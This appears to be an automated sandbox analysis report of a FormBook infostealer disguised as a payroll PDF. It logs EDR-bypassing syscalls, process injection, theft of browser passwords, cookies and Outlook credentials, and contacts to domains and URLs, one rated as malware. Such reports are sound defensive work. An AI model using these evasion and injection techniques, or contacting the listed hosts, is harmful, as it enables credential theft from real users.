Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_002A81F7

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027A364 SetUnhandledExceptionFilter,		0_2_0027A364
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0027A395

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread register set: target process: 6860

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread APC queued: target process: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DC1008

Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002A8C93 LogonUserW,

0_2_002A8C93

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00253B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00253B4C

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00254A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00254A35

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002B4EF5 mouse_event,

0_2_002B4EF5

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

0_2_002A81F7

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_002B4C03

Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4604668970.0000000001701000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000000.2254261062.0000000001700000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2408562716.0000000001911000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: PAYROLL SUMMARY _pdf.exe, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4604668970.0000000001701000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000000.2254261062.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4604668970.0000000001701000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000000.2254261062.0000000001700000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2408562716.0000000001911000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4604668970.0000000001701000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000000.2254261062.0000000001700000.00000002.00000001.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2408562716.0000000001911000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_0027886B cpuid

0_2_0027886B

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_002850D7

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00292230 GetUserNameW,

0_2_00292230

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_0028418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0028418A

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00254AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00254AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: WIN_81
Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: WIN_XP
Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: WIN_XPe
Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: WIN_VISTA
Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: WIN_7
Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: WIN_8
Source: PAYROLL SUMMARY _pdf.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_002C6596
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_002C6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PAYROLL SUMMARY _pdf.exe	53%	ReversingLabs	Win32.Trojan.Strab
PAYROLL SUMMARY _pdf.exe	27%	Virustotal		Browse
PAYROLL SUMMARY _pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.sandranoll.com	11%	Virustotal	Browse
www.dmtxwuatbz.cc	2%	Virustotal	Browse
www.xn--matfrmn-jxa4m.se	0%	Virustotal	Browse
www.catherineviskadi.com	1%	Virustotal	Browse
www.anuts.top	10%	Virustotal	Browse
www.helpers-lion.online	0%	Virustotal	Browse
www.telwisey.info	2%	Virustotal	Browse
www.bfiworkerscomp.com	0%	Virustotal	Browse
www.hatercoin.online	2%	Virustotal	Browse
www.gipsytroya.com	1%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
www.xn--fhq1c541j0zr.com	0%	Virustotal	Browse
www.hprlz.cz	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://reg.ru	0%	Avira URL Cloud	safe
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://reg.ru	0%	Virustotal		Browse
https://dts.gnpge.com	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Avira URL Cloud	safe
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	0%	Virustotal		Browse
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	0%	Virustotal		Browse
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	0%	Virustotal		Browse
http://www.bfiworkerscomp.com/xzzi/	0%	Virustotal		Browse
http://www.bfiworkerscomp.com/xzzi/	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/?_Z1XhZu=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxeruC6VSAZ3gbjbhtXBfFULxOBNiYF/KhRcXzdCdYnjqXRzee6k=&f6Gp=VzB4OR5	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Avira URL Cloud	safe
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Virustotal		Browse
http://www.xn--matfrmn-jxa4m.se/4hda/?_Z1XhZu=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/cDU9mAi5AO1k3J2CN+QyvLAoTep+eWpcszcsTCcamkkP6oiBRs=&f6Gp=VzB4OR5	100%	Avira URL Cloud	malware
https://static.loopia.se/responsive/images/iOS-72.png	0%	Virustotal		Browse
